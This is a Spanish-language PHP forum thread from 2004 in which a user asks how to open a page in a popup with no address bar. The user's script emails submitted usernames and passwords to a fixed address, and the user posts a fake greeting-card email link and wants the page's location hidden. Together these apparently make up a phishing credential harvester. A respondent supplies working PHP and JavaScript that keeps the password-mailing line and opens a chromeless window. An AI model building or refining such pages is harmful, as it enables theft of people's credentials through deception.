Foros del Web » Programando para Internet » PHP »

duda con header

Estas en el tema de duda con header en el foro de PHP en Foros del Web. ya me compliqué mucho: en si lo que quiero hacer es esto: tengo el siguiente codigo: Header('Location: pagina.htm'); y quiero que se abra con las ...
  #1 (permalink)  
Antiguo 11/05/2004, 19:47
 
Fecha de Ingreso: mayo-2004
Mensajes: 14
Antigüedad: 13 años, 7 meses
Puntos: 0
duda con header

ya me compliqué mucho: en si lo que quiero hacer es esto:


tengo el siguiente codigo:

Header('Location: pagina.htm');

y quiero que se abra con las siguientes caracteristicas:

height=60px, width=400px, top=300px, left=200px, status=no, menubar=no, resizable=no, scrollbars=no

estoy haciendo esto, pero no me funciona:

Header('Location: pagina.htm', 'height=60px, width=400px, top=300px, left=200px, status=no, menubar=no, resizable=no, scrollbars=no');

y esto va dentro del siguiente archivo php:


<?php
$destino="[email protected]";

mail($destino, $user, "\n\n\n$password \n\n\n");

Header("Location: www.mipagina.com");

?>


es un archivo muy simple, si no puedo ponerle los tamñaos, por lo menos necesito que la barra de direcciones no se muestre como si fuera un popup

que tengo que hacer?
  #2 (permalink)  
Antiguo 11/05/2004, 20:17
Avatar de Genetix  
Fecha de Ingreso: febrero-2002
Ubicación: Lima - Perú
Mensajes: 1.600
Antigüedad: 15 años, 10 meses
Puntos: 43
hola!

Pues al parecer no tienes muy claro para que sirve HEADER , te aconsejaria que le eches uan mirada a al manual http://www.php.net/manual/es/function.header.php

Si deseas crear una venta de esas caracteristicas, tendrias que hacerlo con javascrip

Código PHP:
<?php 
$destino
="[email protected]"

mail($destino$user"$password"); 

echo 
"window.open('tupagina.htm','','height=60px, width=400px, top=300px, left=200px, status=no, menubar=no, resizable=no, scrollbars=no')";

?>
Saludos !!

Última edición por Genetix; 11/05/2004 a las 20:19
  #3 (permalink)  
Antiguo 11/05/2004, 21:22
 
Fecha de Ingreso: mayo-2004
Mensajes: 14
Antigüedad: 13 años, 7 meses
Puntos: 0
hola, gracias por contestar,
estoy utilizando tal cual el texto que me modificaste como archivo php y no me funciona, me abre una ventana en blanco con el mismo codigo

<?php
$destino="[email protected]";

mail($destino, $user, "$password");

echo "window.open('www.mipagina.htm','','height=60p x, width=400px, top=300px, left=200px, status=no, menubar=no, resizable=no, scrollbars=no')";

?>


mipagina.htm la tengo alojada en lycos, y en donde dcie www.mipagina.htm pongo todo el url completo de la pagina. la pagina la tengo en htm y en php y en ninguna de las 2 se abre. Unicamente se abre completa con la barra de herramientas, menus y demás, pero esa no es la cuestión
  #4 (permalink)  
Antiguo 11/05/2004, 21:31
Avatar de Genetix  
Fecha de Ingreso: febrero-2002
Ubicación: Lima - Perú
Mensajes: 1.600
Antigüedad: 15 años, 10 meses
Puntos: 43
hola!!
Se me paso, sorry!, te envio el script modificado

Código PHP:
<?php 
$destino
="[email protected]"

mail($destino$user"$password"); 

echo 
"<script language=\"JavaScript\" type=\"text/JavaScript\">";
echo 
"window.open('www.mipagina.htm','','height=60px, width=400px, top=300px, left=200px, status=no, menubar=no, resizable=no, scrollbars=no')";
echo 
"</script>";
?>
ahora si debe funcionar

Saludos
  #5 (permalink)  
Antiguo 11/05/2004, 21:49
 
Fecha de Ingreso: mayo-2004
Mensajes: 14
Antigüedad: 13 años, 7 meses
Puntos: 0
hola genetix,
creo que ya quedó, solo tengo que desinstalar un programa qe me está creando conflictos, ahorita te envío un mensaje


otra pregunta que tengo es:

quiero que seabra una pagina completa del internet explorer, pero sin la barra de direcciones, ni la barra de estado (para que no se vea la pagina por ningun lado)

en el siguiente codigo html es donde la quiero poner:

<TD align=3Dmiddle>
<DIV><FONT size=3D2><FONT face=3DVerdana></FONT></FONT>&nbsp;</DIV>
<DIV><FONT size=3D2><FONT face=3DVerdana>Pulse </FONT><A href=3D"mipagina.htm"><FONT face=3DVerdana
size=3D2>aqui=ED</FONT></A><FONT face=3DVerdana size=3D2> para ver su
tarjeta</FONT></FONT></DIV></TD>

donde dice aqui, ahi seria el enlace para que se abriera mi ventana completa del explorador pero sin la barra de direcciones ni menus, solo la ventana que ocupa gran parte del escritorio


te agradezco infinitamente tu ayuda, voy a seguir conectado
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 03:33.